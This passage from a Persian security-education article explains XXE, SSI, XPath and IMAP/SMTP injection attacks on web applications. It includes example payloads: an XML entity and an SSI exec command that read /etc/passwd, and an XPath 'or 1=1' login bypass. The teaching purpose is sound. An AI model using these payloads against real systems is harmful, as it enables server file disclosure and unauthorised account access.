\u062f\u0627\u0634\u062a\u0647 \u0627\u0633\u062a. \u0647\u0645 \u0627\u06a9\u0646\u0648\u0646 \u0646\u06cc\u0632 \u062f\u0631 \u0644\u06cc\u0633\u062a \u0633\u0627\u0644 2021\u060c \u0628\u0627 \u0639\u0646\u0648\u0627\u0646Security Misconfigurations (\u067e\u06cc\u06a9\u0631\u0647\u200c\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0646\u0627\u062f\u0631\u0633\u062a)\u060c \u0627\u062f\u063a\u0627\u0645 \u0634\u062f\u0647 \u0627\u0633\u062a \u0648 \u062f\u0631 \u0631\u062a\u0628\u0647\u200c\u06cc \u067e\u0646\u062c\u0645 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0633\u062a\u0647 \u0628\u0647 \u0646\u0648\u0639 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0646\u062a\u0627\u06cc\u062c\u06cc \u0645\u0627\u0646\u0646\u062f \u0627\u062c\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06cc <a href=\"https:\/\/www.irandnn.ir\/mag\/what-is-a-cross-site-scripting-or-xss-attacks\/\">XSS<\/a>\u060c \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0648 \u062d\u0645\u0644\u0627\u062a\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u062f\u0633\u062a \u0631\u0627 \u0647\u0645\u0631\u0627\u0647 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f.<\/p>\n<p><img decoding=\"async\" class=\"wp-image-4442 aligncenter\" src=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/XXE-300x156.png\" alt=\"\" width=\"785\" height=\"408\" srcset=\"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/XXE-300x156.png 300w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/XXE-1024x531.png 1024w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/XXE-768x398.png 768w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/XXE-1536x797.png 1536w, https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/XXE.png 1920w\" sizes=\"(max-width: 785px) 100vw, 785px\" \/><\/p>\n<p>\u0645\u062b\u0627\u0644:<\/p>\n<p>\u0641\u0631\u0636 \u06a9\u0646\u06cc\u062f \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u06cc\u06a9 \u0641\u0631\u0648\u0634\u06af\u0627\u0647 \u0622\u0646\u0644\u0627\u06cc\u0646\u060c \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0635\u0641\u062d\u0647\u200c\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u06cc\u06a9 \u0645\u062d\u0635\u0648\u0644\u060c \u0627\u0632 \u06a9\u062f XML \u0645\u0634\u0627\u0628\u0647 \u0632\u06cc\u0631 \u06a9\u0647 \u0627\u0632 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u062f\u0631\u06cc\u0627\u0641\u062a \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n<pre>&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\r\n&lt;stockCheck&gt;&lt;productId&gt;381&lt;\/productId&gt;&lt;\/stockCheck&gt;<\/pre>\n<p>\u062d\u0627\u0644\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0645\u062a\u0648\u062c\u0647 \u0639\u062f\u0645 \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0635\u062d\u06cc\u062d\u060c \u062f\u0631 \u0627\u06cc\u0646 \u0642\u0633\u0645\u062a \u0627\u0632 \u0628\u0631\u0646\u0627\u0645\u0647 \u0634\u062f\u0647 \u0648 \u0627\u06cc\u0646 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0631\u0627 \u0628\u0635\u0648\u0631\u062a \u062f\u0633\u062a\u0648\u0631 XML \u0632\u06cc\u0631 \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/p>\n<pre>&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\r\n&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM \"file:\/\/\/etc\/passwd\"&gt; ]&gt;\r\n&lt;stockCheck&gt;&lt;productId&gt;&amp;xxe;&lt;\/productId&gt;&lt;\/stockCheck&gt;<\/pre>\n<p>\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u06cc \u06cc\u0627\u062f \u0634\u062f\u0647 \u0628\u0647 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u062f\u0633\u062a\u0648\u0631 \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0647 \u0628\u0647 \u0627\u062c\u0631\u0627 \u062f\u0631 \u0622\u0645\u062f\u0647 \u0648 \u0641\u0627\u06cc\u0644 \u0633\u06cc\u0633\u062a\u0645\u06cc passwd \u0631\u0627 \u0628\u0647 \u062c\u0627\u06cc \u0635\u0641\u062d\u0647\u200c\u06cc \u0645\u062d\u0635\u0648\u0644\u060c \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f. \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06af\u0641\u062a \u06a9\u0647 \u0628\u0647 \u0639\u0644\u062a \u0648\u062c\u0648\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06cc XML Injection\u060c \u0627\u0645\u06a9\u0627\u0646 \u062d\u0645\u0644\u0647\u200c\u06cc Local File Inclusion \u0646\u06cc\u0632\u060c \u0628\u0631\u0627\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0648\u062c\u0648\u062f \u0622\u0645\u062f.<\/p>\n<h4><strong>\u062d\u0645\u0644\u0647 <\/strong><strong>SSI Injection<\/strong><\/h4>\n<p>SSI\u060c \u0645\u062e\u0641\u0641 \u0639\u0628\u0627\u0631\u062a Server Side Includes \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u0627\u0634\u0627\u0631\u0647 \u0628\u0647 \u062f\u0633\u062a\u0648\u0631\u0627\u0644\u0639\u0645\u0644\u200c\u0647\u0627\u06cc\u06cc \u062f\u0627\u0631\u062f\u060c \u06a9\u0647 \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0628\u060c \u0628\u0631\u0627\u06cc \u062f\u0627\u0634\u062a\u0646 \u0635\u0641\u062d\u0627\u062a HTML\u060c \u0628\u0627 \u0645\u062d\u062a\u0648\u0627\u06cc\u06cc \u067e\u0648\u06cc\u0627 \u0628\u0647 \u0645\u0627 \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0645\u0627 \u0628\u0647 \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u200c \u0646\u06cc\u0627\u0632 \u062f\u0627\u0631\u06cc\u0645 \u06a9\u0647 \u062f\u0627\u0631\u0627\u06cc \u0635\u0641\u062d\u0627\u062a \u0645\u062a\u0639\u062f\u062f\u06cc \u0628\u0627\u0634\u062f \u0648 \u0647\u0631 \u06a9\u062f\u0627\u0645 \u0627\u0632 \u0635\u0641\u062d\u0627\u062a\u060c \u062f\u0627\u0631\u0627\u06cc \u062a\u063a\u06cc\u06cc\u0631\u06cc \u06a9\u0648\u0686\u06a9 \u062f\u0631 \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u062e\u0648\u062f\u060c \u0646\u0633\u0628\u062a \u0628\u0647 \u0635\u0641\u062d\u0647\u200c\u06cc \u062f\u06cc\u06af\u0631 \u0628\u0627\u0634\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u062c\u0632\u0626\u06cc \u062f\u0631 \u06a9\u062f html \u0647\u0631 \u06a9\u062f\u0627\u0645 \u0627\u0632 \u0635\u0641\u062d\u0627\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0639\u0645\u0644\u06cc \u062f\u0634\u0648\u0627\u0631 \u0628\u0627\u0634\u062f. \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627\u060c SSI \u0628\u0647 \u06a9\u0645\u06a9 \u0645\u0627 \u0622\u0645\u062f\u0647 \u0648 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0635\u0641\u062d\u0627\u062a \u0631\u0627 \u0628\u0647 \u0647\u0631\u06a9\u062f\u0627\u0645 \u0648\u0627\u0631\u062f \u06a9\u0646\u062f.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u0627\u0632 \u0646\u0638\u0631 \u0634\u0628\u0627\u0647\u062a\u060c \u0622\u0646 \u0631\u0627 \u0628\u0627 CGI \u0645\u0642\u0627\u06cc\u0633\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06a9\u0647 \u06cc\u06a9 \u0632\u0628\u0627\u0646 \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a\u06cc \u0633\u0645\u062a\u200c\u0633\u0631\u0648\u0631 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u062f\u0631 \u0648\u0627\u0642\u0639\u060c \u067e\u06cc\u0634 \u0627\u0632 \u0622\u0645\u0627\u062f\u0647 \u0634\u062f\u0646 \u0635\u0641\u062d\u0647\u200c\u06cc \u06af\u0641\u062a\u0647 \u0634\u062f\u0647\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u0644\u0639\u0645\u0644 \u200c\u0647\u0627\u06cc SSI\u060c \u062a\u0648\u0633\u0637 \u0648\u0628\u200c\u0633\u0631\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u067e\u0631\u062f\u0627\u0632\u0634 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f. \u0632\u0645\u0627\u0646\u06cc \u0627\u0645\u06a9\u0627\u0646 \u062d\u0645\u0644\u0647\u200c\u06cc SSI Injection \u0628\u0647 \u0648\u062c\u0648\u062f \u0645\u06cc\u200c\u0622\u06cc\u062f \u06a9\u0647 \u0628\u062e\u0634\u06cc \u0627\u0632 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0642\u0627\u0628\u0644 \u06a9\u0646\u062a\u0631\u0644 \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u06a9\u0647 \u067e\u0627\u0633\u062e\u06cc \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0628\u0627 \u062f\u0633\u062a\u0648\u0631\u0627\u0644\u0639\u0645\u0644\u200c\u0647\u0627\u06cc SSI\u060c \u0645\u0648\u0631\u062f \u067e\u0631\u062f\u0627\u0632\u0634 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u0646\u062f. \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u062d\u0645\u0644\u0647\u200c\u06cc SSI \u0645\u0648\u0641\u0642\u06cc\u062a \u0622\u0645\u06cc\u0632 \u0628\u0627\u0634\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0627\u0645\u06a9\u0627\u0646 \u062a\u0632\u0631\u06cc\u0642 \u06a9\u062f\u0647\u0627\u06cc \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0631\u0627 \u0628\u0647 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u062f\u0647\u062f \u0648 \u0646\u062a\u0627\u06cc\u062c\u06cc \u0647\u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0647 <a href=\"https:\/\/www.irandnn.ir\/mag\/what-is-a-cross-site-scripting-or-xss-attacks\/\">XSS<\/a> \u0631\u0627 \u062f\u0631 \u0628\u0631 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f. \u0647\u0645\u0686\u0646\u06cc\u0646\u060c \u0628\u0633\u062a\u0647 \u0628\u0647 \u0633\u0627\u062e\u062a\u0627\u0631 \u0648\u0628\u200c\u0633\u0631\u0648\u0631\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u06cc\u0627 \u062d\u0645\u0644\u0647\u200c\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f\u060c \u062f\u0631 \u0633\u0631\u0648\u0631 \u0634\u0648\u062f \u0648 \u0636\u0631\u0628\u0627\u062a\u06cc \u0647\u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0647\u200c\u06cc OS Command Injection \u0631\u0627 \u062f\u0631 \u067e\u06cc \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f.<\/p>\n<p>\u0645\u062b\u0627\u0644:<\/p>\n<p>\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u0642\u0627\u0628\u0644\u06cc\u062a\u06cc \u062f\u0627\u0631\u062f \u06a9\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u067e\u0633 \u0627\u0632 \u0648\u0631\u0648\u062f \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062e\u0648\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0622\u062f\u0631\u0633 IP \u062e\u0648\u062f \u0631\u0627 \u0628\u0628\u06cc\u0646\u0646\u062f. \u0627\u06cc\u0646 \u0639\u0645\u0644 \u0628\u0627 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u062a\u0635\u0648\u06cc\u0631 \u0632\u06cc\u0631 \u062f\u0631 \u0628\u06a9\u200c\u0627\u0646\u062f \u0628\u0631\u0646\u0627\u0645\u0647 \u0635\u0648\u0631\u062a \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/p>\n<p>\u0646\u0641\u0648\u0630\u06af\u0631 \u067e\u0633 \u0627\u0632 \u0622\u0646 \u06a9\u0647 \u0627\u062d\u062a\u0645\u0627\u0644 \u0648\u062c\u0648\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc SSI Injection \u0631\u0627 \u062a\u0634\u062e\u06cc\u0635 \u0645\u06cc\u200c\u062f\u0647\u062f\u060c \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0641\u06cc\u0644\u062f \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n<pre>&lt;!--#exec cmd=\u201dcat \/etc\/passwd\u201d --&gt;<\/pre>\n<p>\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646\u06a9\u0647 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u062f\u0631 \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0647 \u200c\u062f\u0631\u0633\u062a\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u062f\u0633\u062a\u0648\u0631 \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0627\u062c\u0631\u0627 \u062f\u0631\u0622\u0645\u062f\u0647 \u0648 \u0641\u0627\u06cc\u0644 passwd \u0645\u0627\u0646\u0646\u062f \u062a\u0635\u0648\u06cc\u0631 \u0632\u06cc\u0631 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/p>\n<p>\u0627\u06cc\u0646 \u0645\u062b\u0627\u0644\u060c \u0646\u0645\u0648\u0646\u0647\u200c\u0627\u06cc \u0627\u0632 \u0627\u062c\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06cc Command Injection \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc SSI Injection \u0645\u06cc\u200c\u0628\u0627\u0634\u062f \u06a9\u0647 \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a\u060c \u0645\u0646\u062c\u0631 \u062f\u0633\u062a\u0631\u0633\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0633\u0631\u0648\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a. \u0627\u0644\u0628\u062a\u0647 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u062f\u0631 \u0635\u0648\u0631\u062a \u0627\u062c\u0631\u0627 \u0634\u062f\u0646\u060c \u0628\u0647 \u0647\u0645\u06cc\u0646 \u0633\u0646\u0627\u0631\u06cc\u0648 \u062e\u0644\u0627\u0635\u0647 \u0646\u0634\u062f\u0647 \u0648 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc \u0686\u0646\u062f\u06cc\u0646 \u062d\u0645\u0644\u0647\u200c\u06cc \u062f\u06cc\u06af\u0631 \u0646\u06cc\u0632 \u0628\u0631\u0627\u06cc \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0648\u062c\u0648\u062f \u062e\u0648\u0627\u0647\u062f \u0622\u0645\u062f.<\/p>\n<h4><strong>\u062d\u0645\u0644\u0647 XPath Injection<\/strong><\/h4>\n<p>XPath \u06cc\u06a9 \u0632\u0628\u0627\u0646 \u0628\u0631\u0627\u06cc \u0645\u0633\u06cc\u0631\u200c\u062f\u0647\u06cc \u062f\u0631 \u067e\u0631\u0648\u0646\u062f\u0647\u200c\u0647\u0627\u06cc XML \u0627\u0633\u062a. \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06af\u0641\u062a \u06a9\u0647 \u0627\u06cc\u0646 \u0632\u0628\u0627\u0646 \u0645\u0634\u0627\u0628\u0647 \u0632\u0628\u0627\u0646 SQL \u06a9\u0647 \u0628\u0631\u0627\u06cc \u067e\u0631\u0633\u200c\u0648\u062c\u0648 \u062f\u0631 \u062f\u06cc\u062a\u0627\u0628\u06cc\u0633\u200c\u0647\u0627 \u0627\u0633\u062a\u060c \u0648\u0627\u0633\u0637\u0647 \u0628\u0631\u0627\u06cc \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0627 \u067e\u0631\u0648\u0646\u062f\u0647\u200c\u0647\u0627\u06cc XML \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u0627\u0644\u06af\u0648\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0646\u062e\u0633\u062a\u06cc\u0646 \u0628\u0627\u0631 \u062a\u0648\u0633\u0637 Amit Klein \u06a9\u0634\u0641 \u0634\u062f \u0648 \u0634\u0628\u0627\u0647\u062a \u0632\u06cc\u0627\u062f\u06cc \u0628\u0647 \u062d\u0645\u0644\u0647 <a href=\"https:\/\/www.irandnn.ir\/mag\/sql-injection-attack\/\">SQL Injection<\/a> \u062f\u0627\u0631\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0632\u0645\u0627\u0646\u06cc \u0627\u062a\u0641\u0627\u0642 \u0645\u06cc\u200c\u0627\u0641\u062a\u062f \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0645\u062f\u0646\u0638\u0631 \u0627\u0632 XPath \u0628\u0631\u0627\u06cc \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0627 \u067e\u0631\u0648\u0646\u062f\u0647\u200c\u0647\u0627\u06cc xml\u060c \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f\u060c \u0627\u0645\u0627 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0631\u0648\u06cc \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631 \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f\u061b \u062f\u0631 \u0627\u06cc\u0646 \u0634\u0631\u0627\u06cc\u0637 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0646\u0641\u0648\u0630\u06af\u0631 \u0627\u0632 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0645\u0637\u0644\u0639 \u0634\u062f\u0647 \u0648 \u06a9\u0648\u0626\u0631\u06ccXPath \u00a0\u0631\u0627 \u0628\u0647 \u0634\u06cc\u0648\u0647 \u062e\u0648\u062f \u062a\u063a\u06cc\u06cc\u0631 \u0628\u062f\u0647\u062f \u06a9\u0647 \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a\u060c \u0628\u0633\u062a\u0647 \u0628\u0647 \u0646\u0642\u0637\u0647\u200c\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u060c \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0648\u062c\u0628 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u063a\u06cc\u0631\u200c\u0645\u062c\u0627\u0632\u060c \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u06cc\u0627 \u0627\u0646\u062c\u0627\u0645 \u06cc\u06a9 \u0639\u0645\u0644\u06cc\u0627\u062a \u0633\u0637\u062d \u0628\u0627\u0644\u0627 \u062a\u0648\u0633\u0637 \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0634\u0648\u062f.<\/p>\n<p>\u0645\u062b\u0627\u0644:<\/p>\n<p>\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u060c \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 XPath \u0632\u06cc\u0631 \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u062e\u0648\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n<pre>\"\/\/Employee[UserName\/text()='\" &amp; Request(\"UserName\") &amp; \"' And Password\/text()='\" &amp; Request(\"Password\") &amp; \"']\"<\/pre>\n<p>\u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0628\u0631\u0627\u06cc \u0646\u0641\u0648\u0630 \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0641\u0631\u062f\u06cc \u062f\u06cc\u06af\u0631\u060c \u0628\u0647 \u062c\u0627\u06cc \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631\u060c \u0645\u0642\u0627\u062f\u06cc\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0648\u0627\u0631\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n<p>Username :<em><strong> test&#8217; or 1=1 or &#8216;a&#8217;=&#8217;a <\/strong><\/em><strong><em><br \/>\n<\/em><\/strong>Password :<em><strong> test<\/strong><\/em><\/p>\n<p>\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06cc\u0627\u062f \u0634\u062f\u0647\u060c \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u067e\u06cc\u0644\u0648\u062f \u0648\u0627\u0631\u062f \u0634\u062f\u0647 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u062f\u0633\u062a\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n<pre><em><strong>\/\/Employee[UserName\/text()='test' or 1=1 or 'a'='a' And Password\/text()='test']<\/strong><\/em><em><strong>\u00a0<\/strong><\/em><\/pre>\n<p><em>\u062f\u0631 \u0648\u0627\u0642\u0639 \u062f\u0633\u062a\u0648\u0631 \u06af\u0641\u062a\u0647 \u0634\u062f\u0647 \u0645\u0639\u0627\u062f\u0644 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0639\u0645\u0644 \u062e\u0648\u0627\u0647\u062f \u06a9\u0631\u062f:<\/em><\/p>\n<pre><em><strong>\/\/Employee[(UserName\/text()='test' or 1=1) or ('a'='a' And Password\/text()='test')]<\/strong><\/em><\/pre>\n<p>\u062f\u0631 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0646\u06cc\u0632\u060c \u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0647\u200c\u06cc \u062a\u0632\u0631\u06cc\u0642 \u00a0SQL\u060c \u062f\u0633\u062a\u0648\u0631 \u0634\u0631\u0637\u06cc \u0628\u0631\u0627\u06cc \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0628\u0631 \u0627\u0633\u0627\u0633 \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631\u060c \u0628\u0627 \u062f\u0648 \u0634\u0631\u0637 \u0647\u0645\u06cc\u0634\u0647 \u062f\u0631\u0633\u062a\u060c \u06cc\u0639\u0646\u06cc 1=1 \u0648 \u2018a\u2019=\u2019a\u2019 \u062a\u063a\u06cc\u06cc\u0631 \u0646\u0645\u0648\u062f\u0647 \u0648 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0647 \u0635\u0641\u062d\u0647 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0641\u0631\u062f\u06cc \u062f\u06cc\u06af\u0631 \u0646\u0641\u0648\u0630 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/p>\n<h4><strong>\u062d\u0645\u0644\u0647 <\/strong><strong>IMAP SMTP Injection<\/strong><\/h4>\n<p>\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 